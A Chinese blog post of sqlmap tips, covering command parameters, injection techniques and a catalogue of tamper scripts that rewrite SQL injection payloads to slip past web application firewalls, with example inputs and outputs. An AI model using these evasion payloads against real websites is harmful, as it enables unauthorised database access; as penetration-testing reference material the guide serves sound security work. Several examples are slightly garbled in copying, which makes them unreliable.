通过在乌云网上出现的很多SQL注入漏洞,因此来总结一下,大致使用SQLMAP所遇到的参数。

基本结构

  基本SQLMAP的使用方式就如下所示,使用参数式的方式,按需求添加。

1
2
sqlmap.py -u "http:// *"  --data="a=b" -p a   --level 3 --random-agent --referer="a" 
--technique T --dbms=mysql --cookie="cookie" --tables

参数解释

星号

  在注入的过程中,有时候是伪静态的页面,可以使用星号表示可能存在注入的部分

–data

  使用post方式提交的时候,就需要用到data参数了

-p

  当我们已经事先知道哪一个参数存在注入就可以直接使用-p来指定,从而减少运行时间

–level

  不同的level等级,SQLMAP所采用的策略也不近相同,当–level的参数设定为2或者2以上的时候,sqlmap会尝试注入Cookie参数;当–level参数设定为3或者3以上的时候,会尝试对User-Angent,referer进行注入。

–random-agent

  使用该参数,SQLMAP会自动的添加useragent参数,如果你知道它要求你用某一种agent,你也应当用user-agent选项自己指定所需的agent

–technique

  这个参数可以指定SQLMAP使用的探测技术,默认情况下会测试所有的方式。

  支持的探测方式如下:

  B: Boolean-based blind SQL injection(布尔型注入)
  E: Error-based SQL injection(报错型注入)
  U: UNION query SQL injection(可联合查询注入)
  S: Stacked queries SQL injection(可多语句查询注入)
  T: Time-based blind SQL injection(基于时间延迟注入)

–tamper

  有些时候网站会过滤掉各种字符,可以用tamper来解决(对付某些waf时也有成效)
  –tamper=”space2comment.py”
  理论是用/**/代替空格,当然temper的选项还有很多

  • apostrophemask.py

  作用:用utf8代替引号

  • equaltolike.py

  作用:like 代替等号

  Example:

1
2
3
Input: SELECT * FROM users WHERE id=1

Output: SELECT * FROM users WHERE id LIKE 1
  • space2dash.py

  作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)
  Example:

1
('1 AND 9227=9227') '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
  • greatest.py

  作用:绕过过滤’>’ ,用GREATEST替换大于号。
  Example:

1
('1 AND A > B') '1 AND GREATEST(A,B+1)=A'
  • space2hash.py

  作用:空格替换为#号 随机字符串 以及换行符

  Example:

1
2
Input: 1 AND 9227=9227
Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
  • apostrophenullencode.py

  作用:绕过过滤双引号,替换字符和双引号。
  Example:

1
tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'
  • halfversionedmorekeywords.py

  作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

  Example:

1
2
3
("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() 
AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
 "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
  • space2morehash.py

  作用:空格替换为 #号 以及更多随机字符串 换行符

  Example:

1
2
3
Input: 1 AND 9227=9227 

Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
  • appendnullbyte.py

 作用:在有效负荷结束位置加载零字节字符编码
 Example:

1
('1 AND 1=1') '1 AND 1=1%00'

  常用于access

  • ifnull2ifisnull.py

 作用:绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
Example:

1
('IFNULL(1, 2)') 'IF(ISNULL(1),2,1)'
  • space2mssqlblank.py(mssql)

  作用:空格替换为其它空符号

  Example:

1
2
Input: SELECT id FROM users * 
Output: SELECT%08id%02FROM%0Fusers
  • base64encode.py

  作用:用base64编码替换 Example: (“1’ AND SLEEP(5)#”) ‘MScgQU5EIFNMRUVQKDUpIw==’ Requirement: all

  • space2mssqlhash.py

  作用:替换空格

  Example:

1
('1 AND 9227=9227') '1%23%0AAND%23%0A9227=9227'
  • modsecurityversioned.py

  作用:过滤空格,包含完整的查询版本注释

  Example:

1
('1 AND 2>1--') '1 /*!30874AND 2>1*/--'
  • space2mysqlblank.py

  作用:空格替换其它空白符号(mysql)

  Example:

1
2
3
 Input: SELECT id FROM users 

 Output: SELECT%0Bid%0BFROM%A0users
  • between.py

  作用:用between替换大于号(>)

  Example:

1
('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--'
  • space2mysqldash.py

  作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

注:之前有个mssql的 这个是mysql的

  Example:

1
('1 AND 9227=9227') '1--%0AAND--%0A9227=9227'
  • multiplespaces.py

  作用:围绕SQL关键字添加多个空格

  Example:

1
('1 UNION SELECT foobar') '1 UNION SELECT foobar'
  • :space2plus.py

  作用:用+替换空格

  Example:

1
('SELECT id FROM users') 'SELECT+id+FROM+users'
  • bluecoat.py

  作用:代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

  Example:

1
('SELECT id FROM users where id = 1') 'SELECT%09id FROM users where id LIKE 1'
  • nonrecursivereplacement.py

  双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

  Example:

1
('1 UNION SELECT 2--') '1 UNIOUNIONN SELESELECTCT 2--'
  • space2randomblank.py

  作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集

  Example:

1
('SELECT id FROM users') 'SELECT%0Did%0DFROM%0Ausers'
  • sp_password.py

  作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

  Example:

1
('1 AND 9227=9227-- ') '1 AND 9227=9227-- sp\_password'
  • chardoubleencode.py

  作用: 双url编码(不处理以编码的)

  Example:

1
2
3
Input: SELECT FIELD FROM%20TABLE 

Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
  • unionalltounion.py

  作用:替换UNION ALL SELECT UNION SELECT

  Example:

1
('-1 UNION ALL SELECT') '-1 UNION SELECT'
  • charencode.py

  作用:url编码
  Example:

1
2
3
Input: SELECT FIELD FROM%20TABLE

Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
  • randomcase.py

  作用:随机大小写 Example:

1
2
Input: INSERT
Output: InsERt
  • unmagicquotes.py

  作用:宽字符绕过 GPC addslashes

  Example:

1
2
3
Input: 1′ AND 1=1 

Output: 1%bf%27 AND 1=1–%20
  • randomcomments.py

  作用:用/**/分割sql关键字

  Example:

1
‘INSERT’ becomes ‘IN//S//ERT’
  • charunicodeencode.py

  作用:字符串 unicode 编码

  Example:

1
2
3
Input: SELECT FIELD%20FROM TABLE 

Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
  • securesphere.py

  作用:追加特制的字符串

  Example:

1
('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"
  • versionedmorekeywords.py

  作用:注释绕过

  Example:

1
2
3
Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))# 

 Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
  • space2comment.py
      作用:Replaces space character (‘ ‘) with comments ‘/**/’

  Example:

1
2
3
Input: SELECT id FROM users 

Output: SELECT//id//FROM/**/users
  • halfversionedmorekeywords.py

  作用:关键字前加注释

  Example:

1
2
3
Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa 

Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa

有时发现跑出的数据都是毫无意义的字符

解决方案:

  a)SQLMAP会提示你加–hex或者–no-cast,有时会有帮助
  b)如果你用的是time-based注射,建议增加延时–time-sec等参数,即使你的网速比较好,但是服务器可能遇见各种奇怪环境
  c)增加level的数值

暴力猜表

  针对access站可以构造common-tables.txt

显示unable to connect to the target url

  第一个可能是time-out设置的太小,出现问题,再有可能就是WAF直接把请求拦截掉了,因此得不到响应。

有些waf比较友善,过滤后会提示“参数不合法”,但是也有些waf则直接把请求拦下来无提示导致应答超时,这样在测试时会消耗大量的时间等待响应

  解决方案:减少time-out进行检测,在跑数据时改回time-out

提示possible integer casting detected

  如果是在手工测试,建议到这里可以停止了,节省时间。

  如果是在扫描器扫描的盲注,那么到这里坚决无视警告继续下去。

参考文献:

  http://drops.wooyun.org/tools/4760
  http://drops.wooyun.org/tips/143
  http://www.2cto.com/Article/201306/223082.html
  http://drops.wooyun.org/tips/5254

本文标题:sqlmap常用技巧整理

文章作者:Sherwel

发布时间:2016-02-25, 09:15:45

最后更新:2017-03-22, 00:12:08

原始链接:https://nanshihui.github.io/2016/02/25/sqlmaptips/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

sqlmap常用技巧整理的更多相关文章

  1. find查找文件命令 - Linux系统中的常用技巧整理

    “find”在Linux系统中是比较常用的文件查找命令,使用方法有很多,可以拥有查找文件.文件目录.文件更新时间.文件大小.文件权限及对比文件时间.下面是整理的“find”常用方法,方便以后需要的时候 ...

  2. .htaccess设置301跳转及常用技巧整理

    在虚拟主机环境中,基本上都是Apache环境.Apache的伪静态的设置,都是在网站根目录设置.htaccess文件,在.htaccess文件中无论是伪静态, 还是301跳转,甚至是防盗链和禁止某个I ...

  3. sqlmap常用技巧

    http://nanshihui.github.io/2016/02/25/sqlmaptips/

  4. Python中常用技巧整理

    Python中os.path的妙用  http://xpleaf.blog.51cto.com/9315560/1736956

  5. Android Activity 开发常用技巧整理

    1.设置 Activity 背景色为透明 在style.xml里面声明: <style name="TranslucentActivityStyle" parent=&quo ...

  6. apache环境.htaccess设置301跳转及常用.htaccess技巧整理

    apache环境.htaccess设置301跳转及常用.htaccess技巧整理 无论是Nginx,还是Apache都各自有优势,对于我们普通用户而言基本上也没有多大的区别.在虚拟主机环境中,基本上都 ...

  7. Eclipse,myeclipse开发中常用技巧总结

    一.myeclipse自带包和自己部署的包冲突解决问题方案 原来的依赖设置: 修改后的配置: 二.取消Myeclipse的自动文件验证来增加myeclipse速度 1.Windows –> Pe ...

  8. iPhone不为人知的功能常用技巧,看完后才发现很多用iPhone的人实在是愧对乔布斯! - imsoft.cnblogs

    很多人花了四五千买部苹果,结果只用到四五百块钱的普通手机功能. iPhone不为人知的功能,常用技巧: 网上搜集整理的iPhone快捷键操作,虽然表面上iPhone按键只有一个HOME键,大部分操作都 ...

  9. H5常用技巧

    工作每天都是接触移动的,特将平时工作中常用的技巧整理总结. 一.@support断定浏览器支持情况定义不同样式 @1像素边框 @supports (-webkit-backdrop-filter:bl ...

随机推荐

  1. Angular4 —— NgModule

    http://www.cnblogs.com/dojo-lzz/p/5878073.html

  2. 单KEY业务,数据库水平切分架构实践 | 架构师之路

    https://mp.weixin.qq.com/s/8aI9jS0SXJl5NdcM3TPYuQ 单KEY业务,数据库水平切分架构实践 | 架构师之路 原创: 58沈剑 架构师之路 2017-06- ...

  3. composer命令详解

    composer命令行 你已经学会了如何使用命令行界面做一些事情.本章将向你介绍所有可用的命令. 为了从命令行获得帮助信息,请运行composer或者composer list 命令,然后结合--he ...

  4. json和pickle,XML

    什么是 JSON ? JSON 指的是 JavaScript 对象表示法(JavaScript Object Notation) JSON 是轻量级的文本数据交换格式 JSON 独立于语言:JSON ...

  5. 加载properties文件的三种方法

    源代码: package a.one; import java.io.FileInputStream; import java.io.InputStream; import java.util.Pro ...

  6. LeetCode 806 Number of Lines To Write String 解题报告

    题目要求 We are to write the letters of a given string S, from left to right into lines. Each line has m ...

  7. SQL GROUP BY对多个字段进行分组

    参考链接:http://stackoverflow.com/questions/2421388/using-group-by-on-multiple-columns 在平时的开发任务中我们经常会用到M ...

  8. 《Mysql DML语句》

    1:DISTINCT 用于去重,但是需要注意的是,它是用于所有列的,也就是说,除非指定的列全部相同,否则所有的行都会被检索出来. 2:ORDER BY 用于排序,但是应该注意的是,它因该是 SELEC ...

  9. 并查集——易爆物D305

    部分内容摘自博客http://blog.csdn.net/u012881011/article/details/46883863,感谢 易爆物D305             运行时间限制:1000m ...

  10. JavaScript的cookie和sessionStorage 、localStorage

    localStorage.sessionStorage和cookie的区别与用法请见下面的博客: https://segmentfault.com/a/1190000012057010 cookie的 ...